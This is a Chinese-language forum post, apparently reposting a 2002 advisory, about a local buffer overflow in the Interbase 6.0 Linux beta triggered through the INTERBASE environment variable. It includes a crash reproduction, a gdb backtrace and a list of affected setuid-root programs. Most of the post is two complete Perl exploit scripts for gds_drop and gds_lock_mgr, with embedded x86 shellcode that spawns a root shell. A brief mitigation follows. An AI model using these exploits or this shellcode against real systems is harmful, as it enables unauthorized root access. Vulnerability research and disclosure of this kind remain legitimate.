» 游客:  注册 | 登录 | 会员 | 统计 | 帮助
斑竹的菜园子
 

作者:
标题: Interbase 6.0 malloc()缓冲溢出 (Linux,缺陷) 上一主题 | 下一主题
borneol
管理员




积分 10952
发贴 955
注册 2005-2-23
来自 重庆
状态 离线
#1  Interbase 6.0 malloc()缓冲溢出 (Linux,缺陷)

这是较早收集到的一篇文章?
=====================================

涉及程序:
Interbase 6.0 linux beta

描述:
Linux interbase软件包存在缓冲溢出允许本地非法root

详细:
interbase-6.0-1.i386.rpm随 Mandrake 7.2 CD一起发行。当这个软件的多个程序读取"INTERBASE"环境变量时,由于边界检查错误允许缓冲溢出攻击:

[dotslash@ghetto dotslash]$ export INTERBASE=`perl -e ‘print "A" x 500‘`
[dotslash@ghetto dotslash]$ /usr/local/interbase/bin/gds_drop

结果是:

(gdb) r
Starting program: /usr/local/interbase/bin/gds_drop

Program received signal SIGSEGV, Segmentation fault.
0x400a0832 in ptmalloc_init () at malloc.c:1696
1696 malloc.c: No such file or directory.
in malloc.c
(gdb) bt
#0 0x400a0832 in ptmalloc_init () at malloc.c:1696
#1 0x400a4e64 in malloc_hook_ini (sz=364, caller=0x40092571) at
malloc.c:1856
#2 0x400a0f8d in __libc_malloc (bytes=364) at malloc.c:2798
#3 0x40092571 in _IO_new_fopen (
filename=0xbfffd65c ‘A‘ <repeats 200 times>..., mode=0x80583c0 "r")
at iofopen.c:50
#4 0x0804a244 in ISC_get_config ()
#5 0x41414141 in ?? ()
Cannot access memory at address 0x41414141

以下的suid root程序都面临潜在风险:

/usr/local/interbase/bin/gds_drop
/usr/local/interbase/bin/gds_inet_server
/usr/local/interbase/bin/gds_lock_mgr

通过合适的攻击脚本将使本地用户非法获取root权限。



攻击方法:


#!/usr/bin/perl -w
#
# gds_drop exploit for Interbase 6.0 linux beta
#
# - tested on redhat 7.2
#
# - Developed in the Snosoft Cerebrum test labs
# - (http://www.snosoft.com) - overflow found by KF
#
# coded by stripey - 15/06/2002 (stripey@snosoft.com)
#

($offset) = @ARGV,$offset || ($offset = 0);

$sc = "\x90"x512;
$sc .= "\x31\xd2\x31\xc9\x31\xdb\x31\xc0\xb0\xa4\xcd\x80";
$sc .= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b";
$sc .= "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd";
$sc .= "\x80\xe8\xdc\xff\xff\xff/bin/sh";

$ENV{"FOO"} = $sc;

$buf = pack("l",(0xbffffdc0+$offset))x86;
$buf .= "A";

$ENV{"INTERBASE"} = $buf;

exec("/usr/local/interbase/bin/gds_drop");


#!/usr/bin/perl -w
#
# gds_lock_mgr exploit for Interbase 6.0 linux beta
#
# - tested on redhat 7.2
#
# - Developed in the Snosoft Cerebrum test labs
# - (http://www.snosoft.com) - overflow found by KF
#
# Note: We cannot attach to an interactive shell so it
# will execute /tmp/sh instead...
#
# coded by stripey - 15/06/2002 (stripey@snosoft.com)
#

($offset) = @ARGV,$offset || ($offset = 0);

$sc = "\x90"x512;
$sc .= "\x31\xd2\x31\xc9\x31\xdb\x31\xc0\xb0\xa4\xcd\x80";
$sc .= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b";
$sc .= "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd";
$sc .= "\x80\xe8\xdc\xff\xff\xff/tmp/sh";

$ENV{"FOO"} = $sc;

$buf = pack("l",(0xbffffdc0+$offset))x86;
$buf .= "A";

$ENV{"INTERBASE"} = $buf;

exec("/usr/local/interbase/bin/gds_lock_mgr");


解决方案:
Borland.com尚未提供解决方案。建议禁止相关程序的suid root属性。



0200 1D 06 00 00 A0 86 01 00 FF FF 00 00 1E 06 00 00
         E-mail:webmaster@chenzhang.com
         MSN:borneol_net@hotmail.com
         Home page:www.chenzhang.com
0210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
2005-3-10 14:37
查看资料  发送邮件  访问主页  发短消息  QQ   编辑帖子  引用回复


可打印版本 | 推荐给朋友 | 订阅主题 | 收藏主题



论坛跳转: